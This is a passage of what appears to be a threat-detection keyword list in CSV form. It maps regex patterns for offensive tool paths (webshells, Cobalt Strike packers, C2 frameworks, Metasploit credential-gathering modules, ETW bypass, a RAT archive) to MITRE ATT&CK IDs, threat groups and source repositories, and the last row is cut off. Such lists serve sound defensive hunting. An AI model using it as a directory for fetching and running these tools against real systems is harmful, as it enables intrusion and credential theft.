"*/ftp-libopie.nse*",".{0,1000}\/ftp\-libopie\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7299" "*/ftp-proftpd-backdoor.nse*",".{0,1000}\/ftp\-proftpd\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7300" "*/ftp-syst.nse*",".{0,1000}\/ftp\-syst\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7301" "*/ftp-vsftpd-backdoor.nse*",".{0,1000}\/ftp\-vsftpd\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7302" "*/ftp-vuln-cve2010-4221.nse*",".{0,1000}\/ftp\-vuln\-cve2010\-4221\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7303" "*/fuck.php*",".{0,1000}\/fuck\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","7304" "*/Fuck-Etw.git*",".{0,1000}\/Fuck\-Etw\.git.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","N/A","10","2","102","13","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z","7305" "*/FuckThatPacker*",".{0,1000}\/FuckThatPacker.{0,1000}","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Unknow101/FuckThatPacker","1","1","N/A","N/A","10","10","637","84","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z","7306" "*/fudge_c2.sql*",".{0,1000}\/fudge_c2\.sql.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#linux","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","7307" "*/FudgeC2*",".{0,1000}\/FudgeC2.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration 
and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","7308" "*/fuegoshell.git*",".{0,1000}\/fuegoshell\.git.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","1","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","7309" "*/full-nelson.c*",".{0,1000}\/full\-nelson\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","7310" "*/full-nelson64*",".{0,1000}\/full\-nelson64.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","7311" "*/FullPowers.dll*",".{0,1000}\/FullPowers\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","7312" "*/FunctionalC2/*",".{0,1000}\/FunctionalC2\/.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","N/A","10","10","74","17","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z","7313" "*/fuzz.txt*",".{0,1000}\/fuzz\.txt.{0,1000}","offensive_tool_keyword","fuzz.txt","list of sensible files for fuzzing in system","T1210 - T1190 - T1203 - T1114","TA0002 - TA0003 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Bo0oM/fuzz.txt/blob/master/fuzz.txt","1","1","N/A","N/A","N/A","10","3134","514","2025-03-27T08:34:43Z","2016-01-19T13:35:44Z","7314" "*/fuzz_wordlist.txt*",".{0,1000}\/fuzz_wordlist\.txt.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","1","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","7315" "*/fuzzers/dns*",".{0,1000}\/fuzzers\/dns.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7316" "*/fuzzers/ftp*",".{0,1000}\/fuzzers\/ftp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7317" "*/fuzzers/http*",".{0,1000}\/fuzzers\/http.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7318" "*/fuzzers/ntp*",".{0,1000}\/fuzzers\/ntp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7319" "*/fuzzers/smb*",".{0,1000}\/fuzzers\/smb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7320" "*/fuzzers/smtp*",".{0,1000}\/fuzzers\/smtp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7321" "*/fuzzers/ssh*",".{0,1000}\/fuzzers\/ssh.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7322" "*/FWUprank.ps1",".{0,1000}\/FWUprank\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","7323" "*/g00nv13.php*",".{0,1000}\/g00nv13\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","7324" "*/G0ldenGunSec/*",".{0,1000}\/G0ldenGunSec\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 
- T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","7325" "*/GadgetToJScript.git*",".{0,1000}\/GadgetToJScript\.git.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tool","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","N/A","10","10","942","168","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z","7326" 
"*/gandcrab.profile*",".{0,1000}\/gandcrab\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","7327" "*/ganglia-info.nse*",".{0,1000}\/ganglia\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7328" "*/GatewayConsoleExe_d64.exe*",".{0,1000}\/GatewayConsoleExe_d64\.exe.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","1","N/A","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","7329" "*/gather/credentials*",".{0,1000}\/gather\/credentials.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7330" "*/gather/forensics*",".{0,1000}\/gather\/forensics.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7331" "*/gather/phish_windows_credentials*",".{0,1000}\/gather\/phish_windows_credentials.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","#linux","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","7332" "*/gato/*attack.py*",".{0,1000}\/gato\/.{0,1000}attack\.py.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","1","N/A","N/A","N/A","7","630","55","2025-04-10T23:25:04Z","2023-01-06T15:43:27Z","7333" "*/gato_x-0.5.2.tar.gz*",".{0,1000}\/gato_x\-0\.5\.2\.tar\.gz.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","1","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","7334" "*/gato_x-0.5.3.tar.gz*",".{0,1000}\/gato_x\-0\.5\.3\.tar\.gz.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques 
against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","1","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","7335" "*/Gato-X.git*",".{0,1000}\/Gato\-X\.git.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","1","N/A","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","7336" "*/Gay Porn Mailer.exe*",".{0,1000}\/Gay\sPorn\sMailer\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","7337" "*/GC2-sheet/*",".{0,1000}\/GC2\-sheet\/.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is 